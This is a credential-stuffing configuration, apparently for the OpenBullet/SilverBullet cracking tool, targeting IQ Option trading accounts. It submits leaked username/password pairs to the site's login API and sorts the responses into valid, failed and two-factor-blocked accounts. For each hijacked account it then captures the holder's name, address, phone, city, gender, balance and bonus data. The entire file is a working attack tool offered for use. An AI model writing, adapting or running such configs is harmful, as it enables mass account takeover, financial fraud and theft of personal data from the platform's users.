[SETTINGS]
{
  "Name": "iqoption 👍🏿,
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-08-24T04:05:32.2113281+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@exescape",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "iqoption Blitz Cracking",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#login_in REQUEST POST "https://auth.iqoption.com/api/v2/login" 
  CONTENT "{\"identifier\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 58" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://login.iqoption.com" 
  HEADER "referer: https://login.iqoption.com/" 
  HEADER "sec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid_credentials" 
    KEY "You entered the wrong credentials." 
    KEY "<RESPONSECODE>" Contains "401" 
  KEYCHAIN Success OR 
    KEY "code\":\"success" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "The account is blocked." 
    KEY "\"code\":\"verify" 
    KEY "\"method\":\"sms" 

PARSE "<SOURCE>" LR "\"ssid\":\"" "\"" -> VAR "ssid" 

REQUEST GET "https://user-verification.iqoption.com/api/customer-steps/2.0?flow_id=WEB3" 
  
  HEADER "Host: user-verification.iqoption.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://iqoption.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://iqoption.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" LR "{\"step_id\":\"EMAIL\"" "}" -> VAR "Email" 

PARSE "<Email>" LR "\",\"reason\":" "" -> VAR "Email" 

IF "<Email>" contains "null"

FUNCTION Replace "null" "True" "<Email>" -> CAP "Email Verified" 

ELSE

FUNCTION Replace "\"Verify email address\"" "False" "<Email>" -> CAP "Email Verified" 

ENDIF

REQUEST GET "https://iqoption.com/api/getprofile" 
  
  HEADER "Host: iqoption.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Accept: */*" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://iqoption.com/en" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "{\"isSuccessful\":true" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "{\"isSuccessful\":false" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "\"auth_two_factor\":true," 

#country_id PARSE "<SOURCE>" LR "\"country_id\":" "," CreateEmpty=FALSE -> CAP "cid" 

#user_id PARSE "<SOURCE>" LR "\"user_id\":" "," CreateEmpty=FALSE -> CAP "uid" 

#balance_id PARSE "<SOURCE>" LR "\"balance_id\":" "," CreateEmpty=FALSE -> CAP "bid" 

#name PARSE "<SOURCE>" LR "\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "Fullname" 

#address PARSE "<SOURCE>" LR "address\":\"" "\"" CreateEmpty=FALSE -> CAP "address" 

PARSE "<SOURCE>" LR "{\"account_status\":\"" "\"" CreateEmpty=FALSE -> CAP "Account Status" 

PARSE "<SOURCE>" LR "gender\":\"" "\"" CreateEmpty=FALSE -> CAP "Gender" 

PARSE "<SOURCE>" LR "city\":\"" "\"" CreateEmpty=FALSE -> CAP "city" 

PARSE "<SOURCE>" LR "phone\":\"" "\"" CreateEmpty=FALSE -> CAP "phone" 

PARSE "<SOURCE>" LR "currency\":\"" "\"" CreateEmpty=FALSE -> CAP "currency" 

PARSE "<SOURCE>" LR "balance\":" "," CreateEmpty=FALSE -> CAP "Balance" 

PARSE "<SOURCE>" LR "bonus_total_wager\":" "," CreateEmpty=FALSE -> CAP "Bonus Total" 

PARSE "<SOURCE>" LR "bonus_wager\":" "," CreateEmpty=FALSE -> CAP "Bonus Wager" 

